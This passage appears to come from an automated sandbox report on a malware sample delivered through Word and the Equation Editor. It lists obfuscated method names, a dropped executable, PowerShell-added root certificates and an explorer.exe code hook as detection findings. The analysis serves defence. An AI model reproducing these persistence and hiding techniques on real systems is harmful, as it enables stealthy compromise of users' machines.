      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00085788 push 00000010h; iretd 10_2_0008578A
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00097C3F push esp; iretd 10_2_00097C40
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00094FC8 push ecx; iretd 10_2_00094FC9
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0204EB02 push esp; retn 0000h 10_2_0204EB03
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0204EB1E push esp; retn 0000h 10_2_0204EB1F
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0204E9B5 push esp; retn 0000h 10_2_0204EAE7
      Source: 4q0pGnqqpgTTSL7[1].exe.2.dr | Static PE information: section name: .text entropy: 7.951532410536774
      Source: ihbgfbin.exe.2.dr | Static PE information: section name: .text entropy: 7.951532410536774
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, l6vWB1e3QQcGjD0U0Q.cs | High entropy of concatenated method names: 'nLDXrSfaYq', 'leuXV8mmNy', 'iItXBVa0HV', 'FuAXmyAaOt', 'zEhXnHS8En', 'VfHX3mfT1L', 'eyqXWws3Dm', 'GHMXlNUvG2', 'LmKXQJaGdT', 'zaMXw4wlVW'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, YkqmWPwHXT1Dof8HBx.cs | High entropy of concatenated method names: 'yWFCVw3Rt', 'XqUHLSCPP', 'tSOsORfNr', 'TVPInSPwv', 'cgQcQjZRt', 'Mky1bOaYS', 'kcgEyVoZVZ3VkawcSd', 'V95SNOZM5cm3k5salw', 'BsQNbKMjw', 'V8oiTjqYe'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Mt83m7kf8vpro8b62h.cs | High entropy of concatenated method names: 'inVt8F93bk', 'bgGt5LcLk4', 'cKJtJTLSXc', 'PFXt0HXmSk', 'AlOtbLZmhs', 'P4jtdgsOjq', 'aiItpmGEQE', 'xQKtfJSCqZ', 'KPGtRnn9jX', 'wPHtxH1txn'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, RAPiKAbihyERmIJCsAy.cs | High entropy of concatenated method names: 'atCTZMFO6H', 'qgsTOmTEow', 'znOTCNICfc', 'XtCTHjtFSE', 'MUoTUejfF1', 'WkDTsCYwVl', 'QX5TIubLp8', 'ABfTkJ2vbO', 'ufHTc99gSv', 'oOJT1a5hnV'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, zk9ouufXnNX6cgGtFt.cs | High entropy of concatenated method names: 'cf4p5glQSR', 'mwYp0qqjkV', 'WZWpdWYIaS', 'dkwdaxmbMN', 'dgAdzMqUN9', 'AGppKAjESQ', 'F1KpME32sW', 'n2RpY9IKtM', 'NeCptQGboO', 'S7mpDpI4L4'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, VKswYFpqvvXi8LFXCK.cs | High entropy of concatenated method names: 'GfU9PnWF2D', 'l099aJjEhr', 'PkANKRsInv', 'v7dNM3vfAh', 'JMt9S5BUQ6', 'Hq79VdI6NW', 'lAl9qjhgpl', 'rMc9BaXpcr', 'IWM9mk1ufm', 'N4H9o5H7II'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, ct6qfC6iAWScj7P1qt.cs | High entropy of concatenated method names: 'hSKbU0v7dg', 'JudbIq7aam', 'yFI03IwsRw', 'kvx0WVWD12', 'lrH0lMYEV9', 'HGM0QZd6aG', 'Nwa0wjqQc2', 'IoH06R84VJ', 'zxj0yvWnCM', 'HLL0rgiTn9'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, lTEVKZLOPxSw8XSL4K.cs | High entropy of concatenated method names: 'ToString', 'J0SAS2c5BB', 'tnVAnbehY6', 'ROGA30CrtT', 'nvbAWxlUys', 'XT3AlYPxPO', 'wenAQpPBju', 'KvQAwYCblR', 'mtSA62flFH', 'X5eAyr66Uu'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, GIOroEDHEHdCvcU7Zj.cs | High entropy of concatenated method names: 'AIAMpxyx0T', 'iFqMfGCbcq', 'vuyMxy3ViX', 'o1qMhfJ1RT', 'hnoMXLAJif', 'iPyMAnmT0K', 'pj48kAM3oL39itSlvL', 'MNWGxr5wuBC8topnfP', 'xDwMMFoRx8', 'cs4Mt3luO5'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, fDAJsxI6uXNBMy6W6j.cs | High entropy of concatenated method names: 'U9GN5ainQT', 'UweNJDOOAG', 'V9pN0jPlYG', 'tvmNbfRwN8', 'ln0Nd7lQgG', 'mEaNpyE2CU', 'E6FNfcjBxs', 'NPNNRVSol1', 'TWKNxmdpML', 'Y5PNhmYniu'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, LI1KLjNtJ7u9Tw5Jqk.cs | High entropy of concatenated method names: 'xi6d8skQJZ', 'EaXdJeJO2D', 'GTpdbIAkb4', 'PUZdpMJKs5', 'AAOdfvktr5', 'o9tbeXNZT4', 'MgIbEPLUeF', 'MJ4bGravCp', 'AO5bPdnOsk', 'y2ibjMxCrI'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Ha0q5Nb1yqlsjQJRPS7.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OsSiBLhpwA', 'FGUimvEBfr', 'nxdioXJP80', 'f1QiLAtcRe', 'rgyieyYlZD', 'Q9TiElYdXi', 'tQxiG9clEa'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, x4VJgm7ynwtCPvJCyj.cs | High entropy of concatenated method names: 'p9aTM44Wt5', 'L46Tt4lBIy', 'QWsTD6IkXF', 'AVtT5gn0mO', 'qZYTJ4YPDT', 'xfiTbZjs00', 'HBcTdTI1rG', 'CBvNG8TZiD', 'qQLNPd4nNT', 'cqONjWnV29'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, EwFFCXjNncBSPwukAV.cs | High entropy of concatenated method names: 'Dispose', 'aBuMj8vdZ5', 'JPCYnss4xH', 'zrI445sHjP', 'mU9ManZwwD', 'kwtMzUfN6U', 'ProcessDialogKey', 'c9GYKEc1bh', 'OXmYMf7p7w', 'eLsYY9qxCW'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, tA7i8nJpHHjPLZFuxc.cs | High entropy of concatenated method names: 'sZG0HPgguZ', 'qk70s7IcJj', 'YXP0kEGRPD', 'I050cTns4F', 'yPN0XTMunY', 'Vmq0AQc7fl', 'B4q091qM0M', 'y9j0NxMEGG', 'G1w0TNQEky', 'ywi0ieTfNk'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, GUfLMezVVBW6DFoN6c.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BoQTgf9FTo', 'PUuTXfoaIl', 'TYuTA7sTXQ', 'a4KT94ZwR8', 'cD6TN5wZP4', 'SGGTTTUSWT', 'eKLTipE5dc'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Su1oSotSjI2spxQEP1.cs | High entropy of concatenated method names: 'mi6NvN0ZLC', 'UPxNn7p2wc', 'wOlN3hymm2', 'KlUNWiHnN7', 'wZnNBRJOqC', 'BPwNlMdlpN', 'Next', 'Next', 'Next', 'NextBytes'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, XWDdYZHHnPlrZu8iea.cs | High entropy of concatenated method names: 'hn7gkYRTE9', 'Ik4gcHDC6s', 'Ja2gvkYOn3', 'upOgn1L7Hl', 'mDbgWLBbLH', 'oyuglpv6wf', 'wxLgwbXwgi', 'Iu2g6XB7it', 'VZZgrRPvBy', 'RgcgSFopSH'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, LUlxKFsPGecqmhiLmG.cs | High entropy of concatenated method names: 'bhtpZhhn70', 'ReZpOs4Nne', 'ffVpC7cq6N', 'bT5pHcvSOs', 'fWupUWsB4m', 'zsVpsVSnOK', 'EOfpIQBOvE', 'oq6pkxonfk', 'SL7pc9iml5', 'JG3p1GXvN4'
      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, JqoaEHn6fskh1axBN5.cs | High entropy of concatenated method names: 'uZAJBd5k0U', 'yk2JmXD1ud', 'hWbJon4D3D', 'YOEJLeKQeN', 'DACJeMXjPl', 'CfgJEyWGU7', 'PWiJGA222V', 'O4WJPf7fGq', 'id0JjO6uWb', 'BS2JaXAhDP'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, l6vWB1e3QQcGjD0U0Q.cs | High entropy of concatenated method names: 'nLDXrSfaYq', 'leuXV8mmNy', 'iItXBVa0HV', 'FuAXmyAaOt', 'zEhXnHS8En', 'VfHX3mfT1L', 'eyqXWws3Dm', 'GHMXlNUvG2', 'LmKXQJaGdT', 'zaMXw4wlVW'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, YkqmWPwHXT1Dof8HBx.cs | High entropy of concatenated method names: 'yWFCVw3Rt', 'XqUHLSCPP', 'tSOsORfNr', 'TVPInSPwv', 'cgQcQjZRt', 'Mky1bOaYS', 'kcgEyVoZVZ3VkawcSd', 'V95SNOZM5cm3k5salw', 'BsQNbKMjw', 'V8oiTjqYe'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Mt83m7kf8vpro8b62h.cs | High entropy of concatenated method names: 'inVt8F93bk', 'bgGt5LcLk4', 'cKJtJTLSXc', 'PFXt0HXmSk', 'AlOtbLZmhs', 'P4jtdgsOjq', 'aiItpmGEQE', 'xQKtfJSCqZ', 'KPGtRnn9jX', 'wPHtxH1txn'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, RAPiKAbihyERmIJCsAy.cs | High entropy of concatenated method names: 'atCTZMFO6H', 'qgsTOmTEow', 'znOTCNICfc', 'XtCTHjtFSE', 'MUoTUejfF1', 'WkDTsCYwVl', 'QX5TIubLp8', 'ABfTkJ2vbO', 'ufHTc99gSv', 'oOJT1a5hnV'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, zk9ouufXnNX6cgGtFt.cs | High entropy of concatenated method names: 'cf4p5glQSR', 'mwYp0qqjkV', 'WZWpdWYIaS', 'dkwdaxmbMN', 'dgAdzMqUN9', 'AGppKAjESQ', 'F1KpME32sW', 'n2RpY9IKtM', 'NeCptQGboO', 'S7mpDpI4L4'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, VKswYFpqvvXi8LFXCK.cs | High entropy of concatenated method names: 'GfU9PnWF2D', 'l099aJjEhr', 'PkANKRsInv', 'v7dNM3vfAh', 'JMt9S5BUQ6', 'Hq79VdI6NW', 'lAl9qjhgpl', 'rMc9BaXpcr', 'IWM9mk1ufm', 'N4H9o5H7II'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, ct6qfC6iAWScj7P1qt.cs | High entropy of concatenated method names: 'hSKbU0v7dg', 'JudbIq7aam', 'yFI03IwsRw', 'kvx0WVWD12', 'lrH0lMYEV9', 'HGM0QZd6aG', 'Nwa0wjqQc2', 'IoH06R84VJ', 'zxj0yvWnCM', 'HLL0rgiTn9'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, lTEVKZLOPxSw8XSL4K.cs | High entropy of concatenated method names: 'ToString', 'J0SAS2c5BB', 'tnVAnbehY6', 'ROGA30CrtT', 'nvbAWxlUys', 'XT3AlYPxPO', 'wenAQpPBju', 'KvQAwYCblR', 'mtSA62flFH', 'X5eAyr66Uu'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, GIOroEDHEHdCvcU7Zj.cs | High entropy of concatenated method names: 'AIAMpxyx0T', 'iFqMfGCbcq', 'vuyMxy3ViX', 'o1qMhfJ1RT', 'hnoMXLAJif', 'iPyMAnmT0K', 'pj48kAM3oL39itSlvL', 'MNWGxr5wuBC8topnfP', 'xDwMMFoRx8', 'cs4Mt3luO5'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, fDAJsxI6uXNBMy6W6j.cs | High entropy of concatenated method names: 'U9GN5ainQT', 'UweNJDOOAG', 'V9pN0jPlYG', 'tvmNbfRwN8', 'ln0Nd7lQgG', 'mEaNpyE2CU', 'E6FNfcjBxs', 'NPNNRVSol1', 'TWKNxmdpML', 'Y5PNhmYniu'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, LI1KLjNtJ7u9Tw5Jqk.cs | High entropy of concatenated method names: 'xi6d8skQJZ', 'EaXdJeJO2D', 'GTpdbIAkb4', 'PUZdpMJKs5', 'AAOdfvktr5', 'o9tbeXNZT4', 'MgIbEPLUeF', 'MJ4bGravCp', 'AO5bPdnOsk', 'y2ibjMxCrI'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Ha0q5Nb1yqlsjQJRPS7.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OsSiBLhpwA', 'FGUimvEBfr', 'nxdioXJP80', 'f1QiLAtcRe', 'rgyieyYlZD', 'Q9TiElYdXi', 'tQxiG9clEa'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, x4VJgm7ynwtCPvJCyj.cs | High entropy of concatenated method names: 'p9aTM44Wt5', 'L46Tt4lBIy', 'QWsTD6IkXF', 'AVtT5gn0mO', 'qZYTJ4YPDT', 'xfiTbZjs00', 'HBcTdTI1rG', 'CBvNG8TZiD', 'qQLNPd4nNT', 'cqONjWnV29'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, EwFFCXjNncBSPwukAV.cs | High entropy of concatenated method names: 'Dispose', 'aBuMj8vdZ5', 'JPCYnss4xH', 'zrI445sHjP', 'mU9ManZwwD', 'kwtMzUfN6U', 'ProcessDialogKey', 'c9GYKEc1bh', 'OXmYMf7p7w', 'eLsYY9qxCW'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, tA7i8nJpHHjPLZFuxc.cs | High entropy of concatenated method names: 'sZG0HPgguZ', 'qk70s7IcJj', 'YXP0kEGRPD', 'I050cTns4F', 'yPN0XTMunY', 'Vmq0AQc7fl', 'B4q091qM0M', 'y9j0NxMEGG', 'G1w0TNQEky', 'ywi0ieTfNk'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, GUfLMezVVBW6DFoN6c.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BoQTgf9FTo', 'PUuTXfoaIl', 'TYuTA7sTXQ', 'a4KT94ZwR8', 'cD6TN5wZP4', 'SGGTTTUSWT', 'eKLTipE5dc'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Su1oSotSjI2spxQEP1.cs | High entropy of concatenated method names: 'mi6NvN0ZLC', 'UPxNn7p2wc', 'wOlN3hymm2', 'KlUNWiHnN7', 'wZnNBRJOqC', 'BPwNlMdlpN', 'Next', 'Next', 'Next', 'NextBytes'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, XWDdYZHHnPlrZu8iea.cs | High entropy of concatenated method names: 'hn7gkYRTE9', 'Ik4gcHDC6s', 'Ja2gvkYOn3', 'upOgn1L7Hl', 'mDbgWLBbLH', 'oyuglpv6wf', 'wxLgwbXwgi', 'Iu2g6XB7it', 'VZZgrRPvBy', 'RgcgSFopSH'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, LUlxKFsPGecqmhiLmG.cs | High entropy of concatenated method names: 'bhtpZhhn70', 'ReZpOs4Nne', 'ffVpC7cq6N', 'bT5pHcvSOs', 'fWupUWsB4m', 'zsVpsVSnOK', 'EOfpIQBOvE', 'oq6pkxonfk', 'SL7pc9iml5', 'JG3p1GXvN4'
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, JqoaEHn6fskh1axBN5.cs | High entropy of concatenated method names: 'uZAJBd5k0U', 'yk2JmXD1ud', 'hWbJon4D3D', 'YOEJLeKQeN', 'DACJeMXjPl', 'CfgJEyWGU7', 'PWiJGA222V', 'O4WJPf7fGq', 'id0JjO6uWb', 'BS2JaXAhDP'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, l6vWB1e3QQcGjD0U0Q.cs | High entropy of concatenated method names: 'nLDXrSfaYq', 'leuXV8mmNy', 'iItXBVa0HV', 'FuAXmyAaOt', 'zEhXnHS8En', 'VfHX3mfT1L', 'eyqXWws3Dm', 'GHMXlNUvG2', 'LmKXQJaGdT', 'zaMXw4wlVW'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, YkqmWPwHXT1Dof8HBx.cs | High entropy of concatenated method names: 'yWFCVw3Rt', 'XqUHLSCPP', 'tSOsORfNr', 'TVPInSPwv', 'cgQcQjZRt', 'Mky1bOaYS', 'kcgEyVoZVZ3VkawcSd', 'V95SNOZM5cm3k5salw', 'BsQNbKMjw', 'V8oiTjqYe'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Mt83m7kf8vpro8b62h.cs | High entropy of concatenated method names: 'inVt8F93bk', 'bgGt5LcLk4', 'cKJtJTLSXc', 'PFXt0HXmSk', 'AlOtbLZmhs', 'P4jtdgsOjq', 'aiItpmGEQE', 'xQKtfJSCqZ', 'KPGtRnn9jX', 'wPHtxH1txn'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, RAPiKAbihyERmIJCsAy.cs | High entropy of concatenated method names: 'atCTZMFO6H', 'qgsTOmTEow', 'znOTCNICfc', 'XtCTHjtFSE', 'MUoTUejfF1', 'WkDTsCYwVl', 'QX5TIubLp8', 'ABfTkJ2vbO', 'ufHTc99gSv', 'oOJT1a5hnV'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, zk9ouufXnNX6cgGtFt.cs | High entropy of concatenated method names: 'cf4p5glQSR', 'mwYp0qqjkV', 'WZWpdWYIaS', 'dkwdaxmbMN', 'dgAdzMqUN9', 'AGppKAjESQ', 'F1KpME32sW', 'n2RpY9IKtM', 'NeCptQGboO', 'S7mpDpI4L4'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, VKswYFpqvvXi8LFXCK.cs | High entropy of concatenated method names: 'GfU9PnWF2D', 'l099aJjEhr', 'PkANKRsInv', 'v7dNM3vfAh', 'JMt9S5BUQ6', 'Hq79VdI6NW', 'lAl9qjhgpl', 'rMc9BaXpcr', 'IWM9mk1ufm', 'N4H9o5H7II'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, ct6qfC6iAWScj7P1qt.cs | High entropy of concatenated method names: 'hSKbU0v7dg', 'JudbIq7aam', 'yFI03IwsRw', 'kvx0WVWD12', 'lrH0lMYEV9', 'HGM0QZd6aG', 'Nwa0wjqQc2', 'IoH06R84VJ', 'zxj0yvWnCM', 'HLL0rgiTn9'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, lTEVKZLOPxSw8XSL4K.cs | High entropy of concatenated method names: 'ToString', 'J0SAS2c5BB', 'tnVAnbehY6', 'ROGA30CrtT', 'nvbAWxlUys', 'XT3AlYPxPO', 'wenAQpPBju', 'KvQAwYCblR', 'mtSA62flFH', 'X5eAyr66Uu'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, GIOroEDHEHdCvcU7Zj.cs | High entropy of concatenated method names: 'AIAMpxyx0T', 'iFqMfGCbcq', 'vuyMxy3ViX', 'o1qMhfJ1RT', 'hnoMXLAJif', 'iPyMAnmT0K', 'pj48kAM3oL39itSlvL', 'MNWGxr5wuBC8topnfP', 'xDwMMFoRx8', 'cs4Mt3luO5'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, fDAJsxI6uXNBMy6W6j.cs | High entropy of concatenated method names: 'U9GN5ainQT', 'UweNJDOOAG', 'V9pN0jPlYG', 'tvmNbfRwN8', 'ln0Nd7lQgG', 'mEaNpyE2CU', 'E6FNfcjBxs', 'NPNNRVSol1', 'TWKNxmdpML', 'Y5PNhmYniu'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, LI1KLjNtJ7u9Tw5Jqk.cs | High entropy of concatenated method names: 'xi6d8skQJZ', 'EaXdJeJO2D', 'GTpdbIAkb4', 'PUZdpMJKs5', 'AAOdfvktr5', 'o9tbeXNZT4', 'MgIbEPLUeF', 'MJ4bGravCp', 'AO5bPdnOsk', 'y2ibjMxCrI'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Ha0q5Nb1yqlsjQJRPS7.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OsSiBLhpwA', 'FGUimvEBfr', 'nxdioXJP80', 'f1QiLAtcRe', 'rgyieyYlZD', 'Q9TiElYdXi', 'tQxiG9clEa'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, x4VJgm7ynwtCPvJCyj.cs | High entropy of concatenated method names: 'p9aTM44Wt5', 'L46Tt4lBIy', 'QWsTD6IkXF', 'AVtT5gn0mO', 'qZYTJ4YPDT', 'xfiTbZjs00', 'HBcTdTI1rG', 'CBvNG8TZiD', 'qQLNPd4nNT', 'cqONjWnV29'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, EwFFCXjNncBSPwukAV.cs | High entropy of concatenated method names: 'Dispose', 'aBuMj8vdZ5', 'JPCYnss4xH', 'zrI445sHjP', 'mU9ManZwwD', 'kwtMzUfN6U', 'ProcessDialogKey', 'c9GYKEc1bh', 'OXmYMf7p7w', 'eLsYY9qxCW'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, tA7i8nJpHHjPLZFuxc.cs | High entropy of concatenated method names: 'sZG0HPgguZ', 'qk70s7IcJj', 'YXP0kEGRPD', 'I050cTns4F', 'yPN0XTMunY', 'Vmq0AQc7fl', 'B4q091qM0M', 'y9j0NxMEGG', 'G1w0TNQEky', 'ywi0ieTfNk'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, GUfLMezVVBW6DFoN6c.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BoQTgf9FTo', 'PUuTXfoaIl', 'TYuTA7sTXQ', 'a4KT94ZwR8', 'cD6TN5wZP4', 'SGGTTTUSWT', 'eKLTipE5dc'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Su1oSotSjI2spxQEP1.cs | High entropy of concatenated method names: 'mi6NvN0ZLC', 'UPxNn7p2wc', 'wOlN3hymm2', 'KlUNWiHnN7', 'wZnNBRJOqC', 'BPwNlMdlpN', 'Next', 'Next', 'Next', 'NextBytes'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, XWDdYZHHnPlrZu8iea.cs | High entropy of concatenated method names: 'hn7gkYRTE9', 'Ik4gcHDC6s', 'Ja2gvkYOn3', 'upOgn1L7Hl', 'mDbgWLBbLH', 'oyuglpv6wf', 'wxLgwbXwgi', 'Iu2g6XB7it', 'VZZgrRPvBy', 'RgcgSFopSH'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, LUlxKFsPGecqmhiLmG.cs | High entropy of concatenated method names: 'bhtpZhhn70', 'ReZpOs4Nne', 'ffVpC7cq6N', 'bT5pHcvSOs', 'fWupUWsB4m', 'zsVpsVSnOK', 'EOfpIQBOvE', 'oq6pkxonfk', 'SL7pc9iml5', 'JG3p1GXvN4'
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, JqoaEHn6fskh1axBN5.cs | High entropy of concatenated method names: 'uZAJBd5k0U', 'yk2JmXD1ud', 'hWbJon4D3D', 'YOEJLeKQeN', 'DACJeMXjPl', 'CfgJEyWGU7', 'PWiJGA222V', 'O4WJPf7fGq', 'id0JjO6uWb', 'BS2JaXAhDP'

      Persistence and Installation Behavior

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\ihbgfbin.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4q0pGnqqpgTTSL7[1].exe

      Hooking and other Techniques for Hiding and Protection

      Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE6
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_009188BF IsIconic,GetWindowPlacement,GetLastError,IsZoomed,SetWindowPlacement,GetLastError,SetWindowPos,SetWindowPos,GetClientRect,MoveWindow, 10_2_009188BF
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00918810 IsIconic,GetWindowPlacement,GetLastError, 10_2_00918810
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0091C869 LoadCursorW,SetCursor,DefWindowProcW,IsIconic,GetCursorPos,GetTitleBarInfo,SetCursorPos,SendMessageW, 10_2_0091C869
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_009199FA DefWindowProcW,IsIconic,GetClientRect,GetLastError,VariantClear,CheckMenuItem,DefWindowProcW, 10_2_009199FA
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0091C134 IsWindowVisible,IsIconic, 10_2_0091C134
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00950BF5 GetWindowRect,GetWindowRect,IsWindow,IsIconic,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetWindowRect,PtInRect,PtInRect,PtInRect,SystemParametersInfoW,CopyRect,SetWindowPos, 10_2_00950BF5
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0091B319 LockWindowUpdate,IsIconic,GetWindowPlacement,GetWindowLongW,SetWindowLongW,SetWindowLongW,SetWindowLongW,ShowWindow,SetWindowPos,SetWindowPos,SetWindowPos,LockWindowUpdate, 10_2_0091B319
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0091A341 IsZoomed,IsIconic,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem, 10_2_0091A341
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0091BCCB GetWindowRect,GetWindowLongW,GetWindowLongW,GetWindowLongW,AdjustWindowRectEx,IntersectRect,MoveWindow,IsIconic,GetWindowPlacement, 10_2_0091BCCB
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00916416 IsIconic,GetWindowPlacement,GetWindowRect, 10_2_00916416
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
